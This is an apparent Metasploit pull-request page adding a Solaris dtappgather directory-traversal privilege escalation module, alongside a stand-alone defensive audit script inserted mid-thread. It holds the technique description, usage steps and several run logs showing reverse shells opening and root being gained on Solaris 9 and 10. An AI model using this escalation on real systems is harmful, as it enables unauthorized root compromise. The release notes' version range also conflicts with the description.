Add Solaris 'EXTREMEPARR' dtappgather Privilege Escalation module #10663

Merged (3 commits, Sep 23, 2018)

Conversation

bcoles commented Sep 18, 2018

Add Solaris 'EXTREMEPARR' dtappgather Privilege Escalation module.

    This module exploits a directory traversal vulnerability in the
    `dtappgather` executable included with Common Desktop Environment (CDE)
    on unpatched Solaris systems prior to Solaris 10u11 which allows users
    to gain root privileges.

    dtappgather allows users to create a user-owned directory at any
    location on the filesystem using the `DTUSERSESSION` environment
    variable.

    This module creates a directory in `/usr/lib/locale`, writes a shared
    object to the directory, and runs the specified SUID binary with the
    shared object loaded using the `LC_TIME` environment variable.

    This module has been tested successfully on:

    Solaris 9u7 (09/04) (x86);
    Solaris 10u1 (01/06) (x86);
    Solaris 10u2 (06/06) (x86);
    Solaris 10u4 (08/07) (x86);
    Solaris 10u8 (10/09) (x86);

Verification

  • Start msfconsole
  • Get a session
  • use exploit/solaris/local/extremeparr_dtappgather_priv_esc
  • set SESSION [SESSION]
  • run
  • You should get a new root session

Output

msf5 > use exploit/solaris/local/extremeparr_dtappgather_priv_esc 
msf5 exploit(solaris/local/extremeparr_dtappgather_priv_esc) > set session 1
session => 1
msf5 exploit(solaris/local/extremeparr_dtappgather_priv_esc) > set lhost 172.16.191.196
lhost => 172.16.191.196
msf5 exploit(solaris/local/extremeparr_dtappgather_priv_esc) > run
[*] Started reverse TCP handler on 172.16.191.196:4444 
[+] Created directory /usr/lib/locale/ExDmW
[*] Writing '/tmp/.Wfy7WpcZej/.pv7h2R.c' (170 bytes) ...
[*] Writing '/tmp/.Wfy7WpcZej/.uGjK3nLc5' (175 bytes) ...
[*] Executing payload...
[!] Tried to delete /var/dt/appconfig/appmanager, unknown result
[+] Deleted /tmp/.Wfy7WpcZej/.pv7h2R.c
[+] Deleted /tmp/.Wfy7WpcZej/.pv7h2R
[+] Deleted /usr/lib/locale/ExDmW/ExDmW.so.2
[+] Deleted /usr/lib/locale/ExDmW/ExDmW.so.3
[+] Deleted /tmp/.Wfy7WpcZej/.uGjK3nLc5
[+] Deleted /usr/lib/locale/ExDmW
[+] Deleted /tmp/.Wfy7WpcZej
id
uid=0(root) gid=0(root)
uname -a
SunOS unknown 5.10 Generic_118844-26 i86pc i386 i86pc
cat /etc/release
                        Solaris 10 1/06 s10x_u1wos_19a X86
           Copyright 2005 Sun Microsystems, Inc.  All Rights Reserved.
                        Use is subject to license terms.
                           Assembled 07 December 2005
@h00die h00die mentioned this pull request Sep 18, 2018

h00die commented Sep 21, 2018

Add 10u9 to the list.

msf5 exploit(solaris/local/extremeparr_dtappgather_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.1.1:4444 
[+] /usr/dt/bin/dtappgather is setuid
[+] /usr/bin/at is setuid
[+] gcc is installed
[+] Solaris version 5.10 appears to be vulnerable
[*] Cleaning appmanager directory /var/dt/appconfig/appmanager
[*] Creating directory /usr/lib/locale/PNjrx
[*] Symlinking /usr/lib/locale to /var/dt/appconfig/appmanager
[+] Created directory /usr/lib/locale/PNjrx
[*] Creating directory '/tmp/.gfiAL'
[*] Writing '/tmp/.gfiAL/.Rh2z4O.c' (166 bytes) ...
[*] Max line length is 262145
[*] Writing 166 bytes in 1 chunks of 571 bytes (octal-encoded), using printf
[*] Writing shared objects to /usr/lib/locale/PNjrx
[*] Writing '/tmp/.gfiAL/.I4aGhLwn1y' (175 bytes) ...
[*] Max line length is 262145
[*] Writing 175 bytes in 1 chunks of 534 bytes (octal-encoded), using printf
[*] Executing payload...
[*] Command shell session 2 opened (1.1.1.1:4444 -> 2.2.2.2:32797) at 2018-09-21 14:25:16 -0400
[!] Tried to delete /var/dt/appconfig/appmanager, unknown result
[+] Deleted /tmp/.gfiAL/.Rh2z4O.c
[+] Deleted /tmp/.gfiAL/.Rh2z4O
[+] Deleted /usr/lib/locale/PNjrx/PNjrx.so.2
[+] Deleted /usr/lib/locale/PNjrx/PNjrx.so.3
[+] Deleted /tmp/.gfiAL/.I4aGhLwn1y
[+] Deleted /usr/lib/locale/PNjrx
[+] Deleted /tmp/.gfiAL

cat /etc/release
                    Oracle Solaris 10 9/10 s10x_u9wos_14a X86
@h00die h00die self-assigned this Sep 21, 2018

h00die commented Sep 21, 2018

11.3 fails (as expected, since it's not vulnerable, and the payload would have failed anyway)

msf5 exploit(solaris/local/extremeparr_dtappgather_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 2.2.2.2:4444 
[-] /usr/dt/bin/dtappgather is not setuid
[-] Exploit aborted due to failure: not-vulnerable: Target is not vulnerable. Set ForceExploit to override.
[*] Exploit completed, but no session was created.
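The description at the top of this PR and the 11.3 run just above together spell out the module's preconditions: `/usr/dt/bin/dtappgather` must be setuid (the 11.3 host aborted because it is not), and the release must be prior to Solaris 10u11. The successful runs also show what the module leaves behind if cleanup does not complete (a user-owned directory under `/usr/lib/locale`, a symlink involving `/var/dt/appconfig/appmanager`, and `Tried to delete /var/dt/appconfig/appmanager, unknown result`). The script below is an added example, not code from this PR, the module or Rapid7: a stand-alone POSIX shell audit for the Solaris host that re-implements those two checks and looks for those artifacts. The paths are the ones quoted in this thread; the `/etc/release` parsing is a heuristic built from the release lines shown in the output above, and the sample release strings in the comments and tests are constructed. Because a patched host can keep reporting an old update number, the setuid bit is the decisive signal, as in the module's own check.

```shell
#!/bin/sh
# Added audit script for the EXTREMEPARR discussion; it is not part of the
# Metasploit module or of Rapid7's code. It re-implements, stand-alone on the
# Solaris host, the two preconditions the module's check prints (dtappgather
# setuid, release prior to 10u11) and looks for what the runs above show the
# module leaving behind when cleanup is uncertain: a user-owned directory
# under /usr/lib/locale and a symlink in /var/dt/appconfig/appmanager.
# Paths are those quoted in the PR; the release parsing is a heuristic.

DTAPPGATHER=/usr/dt/bin/dtappgather
LOCALE_DIR=/usr/lib/locale
APPMANAGER_DIR=/var/dt/appconfig/appmanager

# True when the file exists and carries the set-user-ID bit ([ -u ] is POSIX).
is_setuid() {
    [ -f "$1" ] && [ -u "$1" ]
}

# Print "<major> <update>" for the first line of /etc/release, e.g.
# "Oracle Solaris 10 9/10 s10x_u9wos_14a X86" -> "10 9". The update number is
# taken from the sNNx_uNwos token and is 0 when the line has none.
release_version() {
    major=$(printf '%s\n' "$1" | sed -n 's/.*Solaris \([0-9][0-9]*\).*/\1/p')
    update=$(printf '%s\n' "$1" | sed -n 's/.*_u\([0-9][0-9]*\)wos.*/\1/p')
    [ -n "$major" ] || return 1
    printf '%s %s\n' "$major" "${update:-0}"
}

# True when the release line is prior to Solaris 10u11, the range the module
# description gives. A patched 10u10-or-older host still reports its old
# update, so this is only a hint; the setuid bit is the decisive check.
release_vulnerable() {
    set -- $(release_version "$1")
    [ "$#" -eq 2 ] || return 1
    [ "$1" -lt 10 ] || { [ "$1" -eq 10 ] && [ "$2" -lt 11 ]; }
}

# Print subdirectories of $2 whose owner (per ls -ld) is not $1. Solaris find
# has no -maxdepth, so a glob plus ls is used instead. dtappgather's traversal
# leaves exactly such a directory (e.g. /usr/lib/locale/ExDmW above) owned by
# the unprivileged user if the module's cleanup does not run.
dirs_not_owned_by() {
    for d in "$2"/* "$2"/.[!.]*; do
        [ -d "$d" ] || continue
        [ "$(ls -ld "$d" | awk '{print $3}')" = "$1" ] || printf '%s\n' "$d"
    done
}

# Print symlinks directly inside $1 without descending (find -prune is POSIX).
symlinks_in() {
    [ -d "$1" ] || return 0
    find "$1"/. ! -name . -prune -type l -print
}

# Run all checks against the live host and print findings in the module's
# [+]/[-]/[!] style. Always returns 0 so it can be chained in ssh loops.
audit_host() {
    if is_setuid "$DTAPPGATHER"; then
        echo "[+] $DTAPPGATHER is setuid"
    else
        echo "[-] $DTAPPGATHER is missing or not setuid"
    fi
    if [ -r /etc/release ]; then
        line=$(sed -n 1p /etc/release)
        if release_vulnerable "$line"; then
            echo "[+] release line '$line' is prior to 10u11"
        else
            echo "[-] release line '$line' is not in the affected range"
        fi
    else
        echo "[-] /etc/release is not readable"
    fi
    dirs_not_owned_by root "$LOCALE_DIR" | sed 's/^/[!] non-root directory in locale dir: /'
    symlinks_in "$APPMANAGER_DIR" | sed 's/^/[!] symlink in appmanager dir: /'
    return 0
}

audit_host
```

Saved as, say, `extremeparr_check.sh` and run with `sh extremeparr_check.sh` on the host, a `[+]` on both preconditions is the same state the module's check reports before it proceeds; any `[!]` line is a leftover from a run whose cleanup did not complete and is worth correlating with the session timestamps shown in the output above.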

h00die commented Sep 21, 2018

10u2

msf5 exploit(solaris/local/extremeparr_dtappgather_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.1.1:4444 
[+] /usr/dt/bin/dtappgather is setuid
[+] /usr/bin/at is setuid
[+] gcc is installed
[+] Solaris version 5.10 appears to be vulnerable
[*] Cleaning appmanager directory /var/dt/appconfig/appmanager
[*] Creating directory /usr/lib/locale/rpiRihd9
[*] Symlinking /usr/lib/locale to /var/dt/appconfig/appmanager
[+] Created directory /usr/lib/locale/rpiRihd9
[*] Creating directory '/tmp/.4qKYd8wVkW'
[*] Writing '/tmp/.4qKYd8wVkW/.Jfbb7u.c' (170 bytes) ...
[*] Max line length is 262145
[*] Writing 170 bytes in 1 chunks of 586 bytes (octal-encoded), using printf
[*] Writing shared objects to /usr/lib/locale/rpiRihd9
[*] Writing '/tmp/.4qKYd8wVkW/.roWJo1POK' (175 bytes) ...
[*] Max line length is 262145
[*] Writing 175 bytes in 1 chunks of 534 bytes (octal-encoded), using printf
[*] Executing payload...
[*] Command shell session 2 opened (1.1.1.1:4444 -> 2.2.2.2:32783) at 2018-09-21 15:02:37 -0400
[!] Tried to delete /var/dt/appconfig/appmanager, unknown result
[+] Deleted /tmp/.4qKYd8wVkW/.Jfbb7u.c
[+] Deleted /tmp/.4qKYd8wVkW/.Jfbb7u
[+] Deleted /usr/lib/locale/rpiRihd9/rpiRihd9.so.2
[+] Deleted /usr/lib/locale/rpiRihd9/rpiRihd9.so.3
[+] Deleted /tmp/.4qKYd8wVkW/.roWJo1POK
[+] Deleted /usr/lib/locale/rpiRihd9
[+] Deleted /tmp/.4qKYd8wVkW

id
uid=0(root) gid=0(root)
^Z
Background session 2? [y/N]  y
msf5 exploit(solaris/local/extremeparr_dtappgather_priv_esc) > sessions -i 1
[*] Starting interaction with 1...

id
uid=100(solaris) gid=1(other)

    end

    def exploit
      if is_root?

h00die Sep 23, 2018

Any reason this is here and not in check?
Knowing you, there was a thought process behind the decision, just curious for consistency in other modules.

h00die Sep 23, 2018

if it were in check, it could be bypassed by the force exploit.
Not sure why someone would still want to run it while being root, but at least it leaves that option open

bcoles Sep 23, 2018

@h00die It's nice to be able to run the check method to determine whether a host is vulnerable, regardless of our current user context. The host is no more or less vulnerable if we're already root. If we're already root, the host isn't Safe.

There's a separate issue here, which is that there are instances where we'll want to execute the module, even if we are already root. In particular, the is_root? check is not namespace-safe. It's quite possible we'll have a session in a user namespace as root yet still want to execute the module to become real root UID 0.

I haven't had time to open an issue for discussion. My suggestion is to keep the is_root? check outside of the check method, while ensuring it is still included in a ForceExploit conditional in each module. However #10622 needs to be resolved before a code pattern can be developed and implemented in every local exploit module.

@h00die h00die merged commit 7687e6e into rapid7:master Sep 23, 2018
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Metasploit Automation - Test Execution Successfully completed all tests.
continuous-integration/travis-ci/pr The Travis CI build passed
h00die added a commit that referenced this pull request Sep 23, 2018

h00die commented Sep 23, 2018

Release Notes

The Solaris EXTREMEPARR dtappgather module has been added to the framework. It exploits a directory traversal vulnerability in the dtappgather executable that is included on unpatched Solaris systems 10u11 and older. You can achieve root access with this exploit.

@bcoles bcoles deleted the bcoles:extremeparr_dtappgather_priv_esc branch Sep 23, 2018
msjenkins-r7 added a commit that referenced this pull request Sep 24, 2018